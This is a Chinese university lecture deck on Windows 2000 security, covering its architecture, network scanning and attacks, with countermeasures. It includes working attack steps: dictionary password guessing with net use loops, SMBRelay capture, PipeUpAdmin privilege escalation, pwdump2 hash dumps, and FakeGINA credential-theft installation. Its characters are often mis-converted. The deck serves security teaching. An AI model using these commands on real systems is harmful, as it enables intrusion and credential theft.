Windows2000系统安全(1)-网络与信息安全ppt课件

1、Win2k系统平安(1)胡建斌北京大学网络与信息平安研讨室: hjbin /hjbin 目 录Win2K平安架构针对Win2K的平安扫描针对Win2K的攻击Win2K的平安架构Win2K平安子系统Windows NT的设计从最初就思索了平安问题：获得了TCSEC C2认证，这在竞争猛烈的商业操作系统市场中是一个不错的业绩Windows 2000正处于一个类似的规范评价过程中，运用通用规范(Common Criteria, CC)为了获得更高的级别(B级)，Windows 2000需求在它的设计中融入一些关键的元素，包括(但不限于)： 用于认证的平安登录工具 可自在设定的访问控制 审核Windo

2、ws 2000经过它的平安子系统实现了这些功能。图2.1显示了Windows 2000的平安子系统SRM(Security Refrence Monitor)SRM处于内核方式监视用户方式中的运用程序代码发出的资源访问恳求并进展检查一切的平安访问控制运用于一切的平安主体(security principle)平安主体用户组计算机用户帐户账户是一种参考上下文，操作系统在这个上下文描画符运转它的大部分代码。换一种说法，一切的用户方式代码在一个用户账户的上下文中运转。即使是那些在任何人都没有登录之前就运转的代码(例如效力)也是运转在一个账户(特殊的本地系统账户SYSTEM)的上下文中的假设用户运用账

3、户凭据(用户名和口令)胜利经过了登录认证，之后他执行的一切命令都具有该用户的权限。于是，执行代码所进展的操作只受限于运转它的账户所具有的权限。恶意黑客的目的就是以尽能够高的权限运转代码。那么，黑客首先需求“变成具有最高权限的账户系统内建帐户用户帐户攻击本地Administrator或SYSTEM账户是最有权益的账户相对于Administrator和SYSTEM来说，一切其他的账户都只具有非常有限的权限因此，获取Administrator或SYSTEM账户几乎总是攻击者的最终目的组组是用户账户集合的一种容器Windows 2000具有一些内建的组，它们是预定义的用户容器，也具有不同级别的权限放到

4、一个组中的一切账户都会承继这些权限。最简单的一个例子是本地的Administrators组，放到该组中的用户账户具有本地计算机的全部权限系统内建组域中的组当Windows 2000系统被提升为域控制器时，同时还会安装一系列预定义的组权限最高的预定义组包括域管理员(Domain Admins)，它具有域中的一切权限还有企业管理员(Enterprise Admins)，它具有域森林的全部权限域内建组组攻击本地Administrator或SYSTEM账户是最有权益的账户本地Windows 2000系统中的本地Administrators组是最有吸引力的目的，由于这个组的成员承继了相当于管理员的权限D

5、omain Admins和Enterprise Admins是Windows 2000域中最有吸引力的目的，由于用户账户参与到它们当中后将会提升为具有域中的全部权限相对于Administrators、Domain Admins和Enterprise Admins，一切其他的组都只具有非常有限的权限获取Administrators、Domain Admins和Enterprise Admins组中的账户几乎总是攻击者的最终目的特殊用户Windows NT/2000具有一些特殊身份，它们是处于特定传输形状的账户(例如经过网络登录)或来自于特定位置的账户(例如在键盘上进展交互式登录)的容器这些身份可

6、以用来调理对资源的访问控制。例如，NT/2000中对特定进程的访问受限于INTERACTIVE(交互)用户特殊用户SAM (Security Accounts Manager)在独立的Windows 2000计算机上，平安账户管理器担任保管用户账户名和口令的信息口令经过散列并被加密，现有的技术不能将打乱的口令恢复(虽然如此，散列的口令是可以被猜出的) SAM组成了注册表的5个配置单元之一，它在文件%systemroot%system32configsam中实现在Windows 2000域控制器上，用户账户和散列的数据保管在活动目录中(默以为%systemroot%ntdsntds.dit)。散

7、列是以一样的格式保管的，但是要访问它们必需经过不同的方法SYSKEY从NT4 Service Pack 3开场，Microsoft提供了对SAM散列进展进一步加密的方法，称为SYSKEYSYSKEY是System KEY的缩写，它生成一个随机的128位密钥，对散列再次进展加密(不是对SAM文件加密，而是对散列)为了启用SYSKEY，他必需运转SYSKEY命令，SYSKEY森林、树、域作用域信任边境管理域经过将一台或几台Windows 2000效力器提升为域控制器，就可以很容易地创建Windows 2000域域控制器(Domain Controller, DC)是共享的域信息的平安存储仓库，同时

8、也作为域中认证的中央控制机构域定义了共享账户的一种分布边境。域中的一切系统都共用一组账户。在NT中，共享的域信息从主域控制器(Primary DC，PDC)向备份域控制器(Backup DC，BDC)进展复制，称为单主机复制在Windows 2000域中，一切的域控制器都是对等的，它们之间进展的域信息复制称为多主机复制树和森林由于Windows 2000活动目录的实现，域曾经不再像NT中那样是逻辑上的管理边境，在活动目录层次中，在域之上还存在“树和“森林的构造树在很大程度上只是命名上的商定，没有太多平安上的含义，但是森林划分了Windows 2000目录效力的边境，它是管理控制的根本界限作用域

9、信任关系Windows 2000可以在域间构成信任关系。信任关系只是创建了域间的隐含访问才干，但是并没有显式地启用信任可以是单向的或双向的。单向信恣意味着一个域信任另一个域，反过来不存在信任。双向信任定义了两个域之间互置信任。单向信任通常用于允许一个域中的管理员定义对所在域的访问控制规那么，而相反那么不行信任关系信任可以是可传送的和不可传送的。可传送的信恣意味着假设域A传送信任域B，而域B传送信任域C，那么域A就传送信任域C在默许情况下，Windows 2000森林中的一切域之间都存在可传送的、双向的信任Windows 2000可以对森林外的域或NT4域建立单向的、不可传送的信任平安边境由于森

10、林中各个域之间自动建立的双向可传送的信任，导致了可以分配森林中各个域的权限的通用组的存在同一森林中其他域的管理员有夺取活动目录的Configuration容器的一切权并对其进展修正的潜在才干。这种修正将会在森林中的一切域控制器上传播。于是，对于任何参与到该森林的域来说，他必需保证该域的域管理员可以像其他域管理员一样可信Windows 2000森林内部实践的平安边境是森林域入侵的要挟假设一个黑客占领了一个域控制器，森林中的其他域都具有潜在的危险，由于森林中任何域的Domain Admins都可以获取活动目录的Configuration容器的一切权并修正其中的信息，并可以将对该容器的修正复制到森林

11、中其他的域控制器上假设任何外部域的账户在被攻入的域进展认证，那么攻击者可以经过LSA口令缓存来偷取这些账户的口令，这使得他的影响扩展到森林中的其他域假设根域被攻入，那么Enterprise Admins和Schema Admins组的成员可以对森林中的一切域进展全面的控制，除非在此之前他曾经手动限制了这些组的权限 SIDSIDWindow NT/2000内部对平安主体的操作是经过一个称为平安标识符(Security Identifier，SID)的全局独一的48位数字来进展的SID可以防止系统未来自计算机A的Administrator账户与来自计算机B的Administrator账户弄混SID

12、S-1-5-21-1507001333-1204550764-1011284298-500SID带有前缀S，它的各个部分之间用连字符隔开第一个数字(本例中的1)是修订版本编号第二个数字是标识符颁发机构代码(对Windows 2000来说总是为5)然后是4个子颁发机构代码(本例中是21和后续的3个长数字串)和一个相对标识符(Relative Identifier，RID，本例中是500)SID的生成SID中的一部分是各系统和域独一具有的，而另一部分(RID)是跨一切系统和域共享的当安装Windows 2000时，本地计算时机颁发一个随机的SID。类似的当创建一个Windows 2000域时，它也

13、被指定一个独一的SID。于是对任何的Windows 2000计算机或域来说，子颁发机构代码总是独一的(除非故意修正或复制，例如某些底层的磁盘复制技术)RIDRID对一切的计算机和域来说都是一个常数。例如，带有RID 500的SID总是代表本地计算机的真正的Administrator账户。RID 501是Guest账户在域中，从1000开场的RID代表用户账户(例如，RID 1015是在该域中创建的第14位用户)Windows 2000(或者运用适当工具的恶意黑客)总是将具有RID 500的账户辨以为管理员其它的SIDS-1-1-0EveryoneS-1-2-0Interactive用户S-1-

14、3-0Creator OwnerS-1-3-1Creator Group为什么不能总是运用Administrator登录C:net use 4ipc$ password /u: Administrator System error 1326 has occurred. Logon failure: unknown user name or bad password.Windows会自动将当前登录用户的凭据提交给网络登录企图假设用户在客户端上是运用Administrator登录的，这个登录企图就会被解释为客户端希望运用本地Administrator账户登录到远程系统当然，这个账户在远程效力器上没

15、有上下文他可以运用net use命令来手动指定登录上下文，给出远程域、计算机称号或IP地址和用户名，并在用户名前加上反斜线，例如： C:net use 4ipc$ password /u: domainAdministrator The command completed successfully.查看SIDC:user2sid AdministratorS-1-5-21-1507001333-1204550764-1011284298-500Number of subauthorities is 5Domain is CORPC:sid2user 5 21 1507001333 120455

16、0764 1011284298 500Name is AdministratorDomain is CORPType of SID is SidTypeUser认证、授权和审核令牌网络认证审核登录认证过程首先，Windows 2000必需确定本人能否在与合法的平安主体打交道。这是经过认证明现的最简单的例子是经过控制台登录到Windows 2000的用户。用户按下规范的CTRL+ALT+DEL组合键以翻开Windows 2000平安登录窗口，然后输入账户称号和口令。平安登录窗口将输入的凭据传送给担任验证的用户方式组件，如Winlogon和LSASS。假设凭据是有效的，Winlogon将创建一个令

17、牌(或称访问令牌)，并将之绑定到用户登录会话上，稍后访问资源时需求提供令牌令牌令牌中含有与用户账户有关的一切SID，包括账户的SID，还有该用户所属的一切组和特殊身份(如Domain Admins和INERACTIVE)的SID可以运用whoami这样的工具(包含在Windows 2000 Resource Kit中)来查看与登录会话相关的SID网络认证挑战/应对效力器向客户端发出一个随机值(挑战客户端运用用户口令的散列对它进展加密散列函数运算，并将这个新计算出的值(应对)传回效力器效力器从本地SAM或活动目录中取出用户的散列，对刚发送的质询进展散列运算，并将结果与客户端的应对相比较于是，在W

18、indows NT/2000认证过程中，没有口令经过网络传输，即使是以加密的方式也没有Win2K支持的认证方法审核审核战略：即需求记录哪些事件LSASS在系统引导时以及战略修正时将审核战略传送给平安参考监视器SRMSRM和Windows 2000对象管理器一同生成审核记录，并将它们发送给LSASSLSASS添加相关的细节(进展访问的账户的SID等等)并将它们提交给事件日志效力，由后者记录到平安日志中目 录Win2K平安架构针对Win2K的平安扫描针对Win2K的攻击扫描工具Ping小榕流之光NetScanTools Pro 2001(NSTP2001) nwpswSuperScan found

19、stone/rdlabs/tools.php?category=ScannerFscan foundstone/rdlabs/tools.php?category=ScannerSAINTNMAP eeye/html/Research/Tools/index.htmlNetcat(NC)NetBIOS查找工具Net ViewNbtstatNbtscannetviewxDNS查找工具Net viewNslookupNltest共享资源查找工具DumpSecenumNeteSID查找工具user2sidSid2useruserinfoUserdumpGetAcctSNMP查找工具snmputilS

20、olar Winds活动目录查找工具ldpSolar Winds对策在网络或主机级别上，制止对TCP和UDP端口和445的访问禁用SMB效力将RestrictAnonymous设置为2SMB(Server Message Block ,局域网上提供共享文件和打印机的协议禁用端口在本地衔接的属性窗口中，翻开Internet Protocol (TCP/IP)的属性，然后选择Advanced | WINS标签，有一个选项称为Disable NetBIOS over TCP/IP，如下图禁用SMB多数用户能够会以为禁用了TCP/IP上的NetBIOS就曾经胜利地制止了对他们的计算机的SMB访问。这是

21、错误的。这个设置只是禁用了NetBIOS会话效力，即TCP端口Windows 2000在TCP 445上运转了另一个SMB监听程序。系统版本高于NT4 Service Pack 6a的Windows SMB客户端在试图与TCP 建立衔接失败后，会自动转向TCP 445，因此空会话依然可以被客户建立，即使TCP 曾经禁用或阻塞禁用445端口翻开Network and Dial-up Connections(网络和拨号衔接)，选择Advanced菜单中的Advanced Settings(高级设置)，然后在适当的适配器上取消对File and Printer Sharing for Microso

22、ft Networks(Microsoft网络的文件和打印机共享)的选择，如下图禁用SNMP删除SNMP代理配置为只对特定的IP地址作呼应配置为只对特定的IP地址作呼应在运用独一的一台管理任务站轮询一切设备的SNMP数据的环境中，这是一种典型的配置翻开Services MMC | SNMP Service Properties对话框 | Security标签，选择Accept SNMP packets from these hosts单项选择按钮，并指定他的SNMP管理任务站的IP地址，如下图目 录Win2K平安架构针对Win2K的平安扫描针对Win2K的攻击针对Win2K的攻击SMB攻击权限

23、提升获得交互扩展影响去除痕迹攻击手段猜测用户名和密码获取密码散列利用脆弱的网络效力或客户端获取对系统的物理访问SMB攻击猜测SMB密码窃听SMB认证攻击前预备任务封锁与目的之间的空衔接回想扫描结果防止账户锁定管理员的重要性封锁与目的之间的空衔接由于NT/2000不支持同时运用不同的凭据进展衔接，我们必需运用net use /delete命令注销现有的与目的之间的全部空会话(运用/y参数可以使衔接封锁而不用进展提示)： C:net use * /d /y回想扫描结果实验室或测试账户 在他的环境中存在多少这样的账户？其中有多少个位于本地的Administrators组中？他能否知道这样的账户的密码

24、通常是什么在注释字段中带有丰富信息的用户账户 经过查点获取的信息，见到过在这个字段中以明文的方式写出的密码。那些不情愿记住复杂密码的“不幸的用户经常在注释字段中有很多提示，其有助于密码猜测Administrators组或Domain Admins组的成员 这些账户通常是攻击者的目的，由于它们拥有本地系统或域的至高无上的权限。同时，运用Microsoft的默许工具不能锁定本地的Administrator账户，这使得它成为延续密码猜测攻击的目的回想扫描结果共享的组账户 大多数组织都倾向于在给定环境中的大部分系统上重用账户凭据。例如类似于backup(备份)或admin(管理)这样的账户称号。这些账

25、户的密码通常都比较容易猜测最近一定时期内没有修正正密码的账户 这通常阐明用户和系统管理员对账户维护任务的不注重，有能够导致潜在的危险。这些账户也能够会运用在创建该账户时指定的默许密码，这是很容易猜出的(通常会运用单位的称号，或者是Welcome(欢迎)等单词最近一定时期内没有登录过的账户 同样，运用频率很低的账户也是维护任务的忽略所导致的，它们的密码通常也比较容易猜出防止账户锁定探测锁定阈值Enum pGuest帐户猜测 在Windows 2000上，Guest账户在默许情况下是被禁用的，但是假设他到达了锁定阈值，他依然可以收到提示Guest猜测C:net use victimipc$ * /

26、u:guest Type the password for mgmgrandipc$: System error 1326 has occurred. Logon failure: unknown user name or bad password.C:net use victimipc$ * /u:guest Type the password for mgmgrandipc$: System error 1909 has occurred. The referenced account is currently locked out and may not be logged on to.

27、Guest猜测在猜测Guest(或其他账户)的密码时，需求留意的另外一件事是假设他确实猜对了一个曾经被禁用账户的密码，那么将会出现另一种不同的错误音讯： C:net use victimipc$ * /u:guest Type the password for mgmgrandipc$: System error 1331 has occurred. Logon failure: account currently disabled.在Windows 2000中，Guest账户的密码默以为空。于是，假设他延续地以空密码来猜测Guest账户，那么永远也不会到达锁定阈值(除非密码被人为修正正)开场

28、攻击猜测SMB密码手工SMB密码猜测C:net use victimipc$ password /u:victimusername System error 1326 has occurred. Logon failure: unknown user name or bad password.能够的用户名密码组合运用For循环字典攻击创建字典 C:echo credentials.txt administrator administrator password administrator administrator运用For循环字典攻击猜测C:FOR /F tokens=1,2* %i in

29、(credentials.txt)More? do net use victimIPC$ %j /u:victim%iMore? 2nulMore? & echo %time% %date% outfile.txtMore? & echo victim acct: %i pass: %j outfile.txt运用For循环字典攻击查看猜测结果 C:type outfile.txt 11:53:43.42 Wed 05/09/2001 victim acct: administrator pass: 自动攻击工具NATSMBGrindFgrind 对策实施密码复杂性要求账户锁定启用登录失败事件

30、的审核查看事件日志锁定真正的Administrator账户并创建一个假目的禁用闲置账户仔细核对管理人员实施密码复杂性要求账户锁定启用登录失败事件的审核查看事件日志来自Foundstone公司的NTLast来自Foundstone公司的VisualLast来自TNT Software公司的事件日志监视器(ELM)来自Aelita Software公司的EventAdmin锁定真正的Administrator账户NT4 Resource Kit中提供了一个称为passprop的工具Windows 2000上运转admnlock只能任务在安装了SP2或更高的系统上，并且只需在系统或域设置了账户锁定阈

31、值之后才会发生作用要运用admnlock在网络中锁定真正的Administrator账户，运转如下命令： C:admnlock /e The Administrator account may be locked out except for interactive logons查看事件日志来自Foundstone公司的NTLast来自Foundstone公司的VisualLast来自TNT Software公司的事件日志监视器(ELM)来自Aelita Software公司的EventAdmin禁用闲置账户开场攻击窃听SMB认证窃听方法直接从网络电缆上嗅探SMB凭据运用欺骗性效力器捕获SMB

32、凭据中间人(Man-in-the-middle，MITM)攻击LAN Manager的口令散列微软在Windows NT 和 2000系统里缺省安装了LAN Manager口令散列由于LAN Manager运用的加密机制比微软如今的方法脆弱，LAN Manager的口令能在很短的时间内被破解。即使是强壮的口令散列也能在一个月内破解掉LAN Manager的口令散列机制长的口令被截成14个字符 短的口令被填补空格变成14个字符口令中一切的字符被转换成大写口令被分割成两个7个字符的片断LAN Manager的口令散列机制 LM算法是从账户密码的两个独立的7个字符分段创建用户的散列的前8个字节来自于

33、用户密码的前7个字符，随后的8个字节来自于密码的第814个字符LAN Manager的口令散列机制每块都可以经过对一切能够的8字节组合进展穷举攻击而猜出攻击全部的8字节“字符空间 对于现代的桌面计算机处置器来说是很轻松的事情假设攻击者可以发现用户的LM散列，那么他们最终破解得到实践的明文密码就很能够了L0phtcrackL0phtcrack的局限性只能从共享介质中捕获质询-应对通讯目前还不能从两个Windows 2000系统间的登录交换中获取散列经过网络监听破解质询-应对散列所需的时间随着添加的密码散列数量而线性增长在运用SMBCapture之前，WinPcap v2.1报文捕获驱动程序必需胜

34、利安装和运转目前还不能从NTLMv2质询-应对通讯中得到散列欺骗将SMB登录重定向到攻击者假设攻击者可以欺骗用户衔接到他所指定的SMB效力器上去，捕获LM应对就变得容易多L0phtcrack的早期版本中曾经建议了一种最根本的欺骗方法：向目的用户发送一封电子邮件，其中嵌入冒充的SMB效力器的超级链接。用户收到这封邮件，单击超级链接(手动的或自动的)，客户端会在不受留意的情况下将该用户的SMB凭据经过网络发送这样的超级链接很容易伪装，而且通常只需求与用户进展很少的交互，由于假设没有明确提供其他认证信息的话,Windows会自动尝试以当前用户的身份登录对策确保遵守网络平安的最正确操作准那么。在遭到维

35、护的网络中运用SMB效力，确保全部的网络根底设备不允许SMB通讯到达不受信任的结点上配置网络中一切的Windows系统，制止LM散列在网络中的传播制止发送LM散列运用SMBRelay捕获SMB认证SMBRelaySMBRelay实践上是一个SMB效力器，它可以从到来的SMB通讯中搜集用户名和密码散列顾名思义，SMBRelay不仅可以实现虚伪的SMB终端的功能在特定的情况下，它还可以进展中间人(man-in-the-middle，MITM)攻击建立假的SMB效力器 C:smbrelay /ESMBRelay v0.992 ?TCP (NetBT) level SMB man-in-the-mid

36、dle relay attackCopyright 2001: Sir Dystic, Cult of the Dead CowSend complaints, ideas and donations to sirdysticcultdeadcow2 ETHERNET CSMACD ?3Com 10/100 Mini PCI Ethernet Adapter1 SOFTWARE LOOPBACK ?MS TCP Loopback interface启动假的SMB效力器C:smbrelay /IL 2 /IR 2 ；在序号为2的网络接口上建立SMBRelay v0.992 ?TCP (NetBT

37、) level SMB man-in-the-middle relay attackCopyright 2001: Sir Dystic, Cult of the Dead CowSend complaints, ideas and donations to sirdysticcultdeadcowUsing relay adapter index 2: 3Com EtherLink PCI等待并捕获SMB衔接Connection from 4:1526Request type: Session Message bytesUsername: administratorDomain: CAESA

38、RS-TSOS: Windows 2000 2195Lanman type: Windows 2000 5.0Password hash written to disk权限提升命名管道预测NetDDE权限提升权限提升通常是指提升当前用户账户的才干，到达具有更高权限的账户，通常是超级用户，例如Administrator或SYSTEM的过程从恶意黑客的角度来说，获取一个普通账户，然后进展权限提升攻击，比远程进展攻击直接获取超级用户权限要容易得多不论在哪种情况下，无论他到达了什么特权级别，经过认证的攻击者都比未经过认证时要有很多到达目的的选择命名管道预测Guardent的研讨员发现，Windows

39、2000在运用命名管道时存在一个破绽，这个破绽允许任何交互式登录的用户模拟SYSTEM账户，并运用该账户的权限运转恣意的程序Windows 2000运用可预测的命名管道用于经过效力控制管理器(Service Control Manager，SCM)控制效力命名管道预测SCM运用一个独一的命名管道用于它启动的每个效力的进程间通讯。这个命名管道的格式是： .pipenetNtControlPipe12；其中12是管道编号。经过读取注册表主键 HKLMSYSTEMCurrentControlSetControlServiceCurrent，攻击者可以预测下一个命名管道将是.pipenetNtCont

40、rolPipe13命名管道预测攻击命名管道预测攻击利用管道编号的这种可预测性，它在SCM创建同名管道之前先创建这个管道当一个新的效力启动时，它将衔接到这个恶意的管道经过命令SCM启动恣意的一个效力，通常是以具有高度特权的账户运转的效力，SCM将该效力衔接到恶意的管道上去。恶意的管道于是就可以模拟该效力的平安上下文，作为SYSTEM身份或该效力所在的恣意账户的身份执行命令PipeUpAdminPipeUpAdmin可以将当前用户账户添加到本地的Administrtors组中，下面的例子将阐明这一点这个例子假设用户wongd曾经经过了认证，可以交互地访问命令控制台wongd是Server Oper

41、ators组的一位成员PipeUpAdmin攻击首先，wongd对全体的本地Administrators组的成员进展检查C:net localgroup administratorsAlias nameadministratorsComment Administrators have complete and unrestricted access to the computer/domain Members-AdministratorThe command completed successfully.PipeUpAdmin攻击下一步，wongd试图将本人添加到Administrators组

42、中，但收到了一条回绝访问的错误音讯，由于不具有足够的权限C:net localgroup administrators wongd /add System error 5 has occurred. Access is denied.PipeUpAdmin攻击执行pipeupadminC:pipeupadminPipeUpAdmin Maceo maceodogmile (C) Copyright 2000-2001 dogmileThe ClipBook service is not started.More help is available by typing NET HELPMSG 3

43、521.Impersonating: SYSTEMThe account: FS-EVILwongd has been added to the Administrators group.PipeUpAdmin攻击检验身份C:net localgroup administratorsAlias nameAdministratorsCommentAdministrators have complete and unrestricted access to the computer/domainMembers-AdministratorwongdThe command completed succ

44、essfully.PipeUpAdmin攻击退出并重新登录，获取administrator组用户权限很多权限提升攻击都需求这个过程，由于Windows 2000需求重新创建当前用户的访问令牌，以便参与新的组成员关系的SID作为SYSTEM身份运转的NetDDE2001年2月，stake的Dildog发现了Windows 2000的网络动态数据交换效力(Network Dynamic Data Exchange Service，NetDDE)中的一个破绽，这个破绽允许本地用户以SYSTEM特权运转恣意的命令NetDDE是使运用程序经过“受信任的共享来共享数据的一种技术。经过受信任的共享，可以发出

45、恳求执行运用程序，并运转在SYSTEM账户的上下文中获得交互命令行控制GUI控制交互方式一旦攻击者获取了对Windows 2000系统的管理访问，几乎没有什么方法可以阻止他 将带来的损害。很少有攻击者会满足于他所获得的“管理成就并称心地分开。相反，他总会进一步企图获取交互式的控制交互控制是查看系统的内部任务形状并恣意执行命令的才干，就像物理上坐在系统前面一样。在Windows世界中，这可以经过两种方式之一来实现：经过命令行界面，例如类似于telnet的衔接，或者经过图形化的界面，例如PCAnywhere、Microsoft终端效力器或其他类似的远程控制产品当然，攻击者不会希望运用这种分量级的技

46、术，他们需求的是小的、易于隐藏的控制方法命令行控制Remote.exeNet usenetcatRemote.exeremote.exe来自于Windows NT/2000 Resource Kitremote.exe可以运转于效力器方式或客户端方式要运用remote.exe获取目的Windows系统的命令行控制，他必需进展如下步骤的操作：Remote.exe1.与目的之间创建管理衔接：C:net use ipc$ password /u:administrator2.将一个驱动器映射到管理共享C$：C:net use * c$Drive D: is now connected to c$.T

47、he command completed successfully.Remote.exe3.将remote.exe复制到目的上的一个目录中：C:copy remote.exe d:winntsystem324.调用sc命令启动方案义务效力：C:sc start schedule5.确定远程系统上的时间：C:net time 6.运用at命令启动remote.exe程序，运转为效力器方式:C:at 2:12A 摂remote /s cmd hackwin “Remote.exe7.检查能否曾经经过at命令启动了remote.exe程序：C:at Status IDDayTimeCommand L

48、ine-21Today2:12 AMremote /s cmd hackwin8.以客户端方式运转remote.exe程序，衔接到目的系统：C:remote /c hackwin扩展影响确定审核密码提取密码破解文件搜索GINA木马嗅探跳板端口重定向确定审核Windows审核可以在事件日志或syslog中记录下特定的事件，以审查历史。日志甚至可以用来触发向系统管理员发出寻呼警告或电子邮件因此，确定审核形状通常是协助了解黑客在系统上所可以停留时间的不错的方法auditpolauditpolC:auditpol Running (X) Audit EnabledSystem= Success and

49、 FailureLogon= FailureObject Access= Success and FailurePrivilege Use= Success and Failure密码提取系统中的密码存储有很多种不同的方式我们将讨论保管密码的各种不同的位置，以及用来获取这些密码的方法获取可逆加密的密码只需在活动目录域控制器上才可以运用Local Security Setting：Store Passwords with Reversible Encryption(本地平安设置：以可逆加密方式存储密码)选项。在默许情况下，这个设置是被禁用的，也就是说，密码不是以可逆的加密方式存储的这是有利于平安

50、的但是，假设有人启用了这个设置，那么在此之后新创建的密码将依然以普通的SAM/AD散列方式存储，但是是以一种独立的、可逆的加密格式保管的。与单向散列不同，在知道了加密密钥的情况下，这种格式可以被反向解密为明文的密码获取可逆加密的密码假设攻击者攻入了域控制器，他们很能够会立刻检查这个设置，假设发现它被启用，那么攻击者将可以利用工具来获取整个域中一切人的明文密码目前，还没有哪种公开发布的工具可以完成这项任务，但是由于很多API的文档非常丰富完好，因此编写这样的程序应该是很简单的转存SAM和活动目录密码从注册表中转存密码是一项简单的任务系统的默许syskey是平安账户管理器(Security Acc

51、ounts Manager，SAM)或活动目录(AD)数据库。这意味着系统中的用户名和密码是运用128位加密的，使得破解密码几乎是不能够的。但是不要担忧，经过运用由Todd Sabin编写的经过修正的pwdump2工具，依然有方法可以获取加密的密码散列Pwdump2运用了一种称为动态加载库(Dynamically Loadable Library，DLL)注入的技术。这种技术可以经过一个进程强迫其他的进程装载附加的DLL，然后在其他进程的地址空间和用户上下文中运转这个DLL中的代码Pwdump2C:copy pwdump2.exe c$C:copy samdump.dll c$远程C:pwdu

52、mp2Administrator:500:e6efe4be4568c7fdaad3b435b51404ee:fd64812d22b9b94638c2a7ff8c49ddc6:george:1006:315b02fdd7121d6faad3b435b51404ee:d1cd4a77400159a23c47ce7e8808513d:Guest:501:aad3b435b51404eeaad3b435b51404ee:密码破解一旦从远程系统获取了加密的密码或散列，攻击者通常会把它们保管在文件中，并对它们运转密码破解程序以发现真正的密码很多人错误地以为密码破解是解密密码。现实并非如此目前还没有方法可以

53、对运用NT/2000算法加密的密码散列进展解密。密码破解的过程实践上是运用一样的算法对知的值进展散列运算，然后将结果与运用pwdumpX等工具获取的散列进展比较。假设散列匹配，那么攻击者就知道了密码的明文值。因此，密码破解可以被以为是一种高级的、离线的密码猜测方法。密码破解工具John the RipperL0phtcrack3文件搜索findFindstrGrepInvisiable Keylogger Stealyh(IKS) 击键记录工具GINA木马GINA(Graphical Identification and Authorization，图形化鉴定和授权)是用户和Windows认证

54、系统之间的中间人当他启动他的计算机时，屏幕上要求他按下CTRL+ALT+DEL进展登录的时候，这正是GINA在任务当然，由于GINA本身的严密性质，很多黑客很关注它的破解。特定的程序可以将本人介入到用户和操作系统之间，从而窃取用户的密码GINA木马FakeGINA来自Ntsecurity.nu的Arne Vidstrom开发的FakeGINA是IKS等击键记录程序的替代品。这个程序可以介入到Winlogon和GINA之间的通讯当中去，捕获在CTRL+ALT+DEL之后输入的用户名和密码然后FakeGINA会将捕获的用户名和密码写入到一个文本文件中去。这个程序是经过交换注册表中现有的msgina

55、.dll来到达这个目的的FakeGINA的安装为了远程安装这个程序，攻击者需求按照下面的步骤进展操作：1.将fakegina.dll复制到远程驱动器的%SystemRoot%system32目录中去。C:copy fakegina.dll admin$system322.运用Resource Kit工具reg.exe，向Windows注册表中参与如下键值：C:reg add “SOFTWAREMicrosoftWindows NTCurrentVersion Winlogon GinaDLL=fakegina.dll?REG_SZ Connecting to remote machine Th

56、e operation completed successfully.3.运用Resource Kit工具shutdown重新启动系统：C:shutdown /R /T:1 /Y /CFakeGINA的安装4.等待用户登录，然后查看文件%SystemRoot%system32passlist.txt中的原始登录用户名和密码。假设攻击者曾经将C$共享映射为他的I:驱动器： I:WINNTsystem32type passlist.txt FRED-W2KSStu n0t4u2c FRED-W2KSAdministrator h4pped4ze他可以看到，用户Stu的密码为“n0t4u2c，Administrator的密码为“h4pped4ze。攻击者在搜集了这个密码之后可以继续等待其他用户的登录，并开场对网络的下一步攻击。嗅探工具Sniffer FsniffDsniff for Win32Ethereal中继跳板攻击者获取了一个系统的访问权所导致的最大危险能够在于他可以利用这个系统作为跳板，从而进一步攻击其他的系统这种利用一个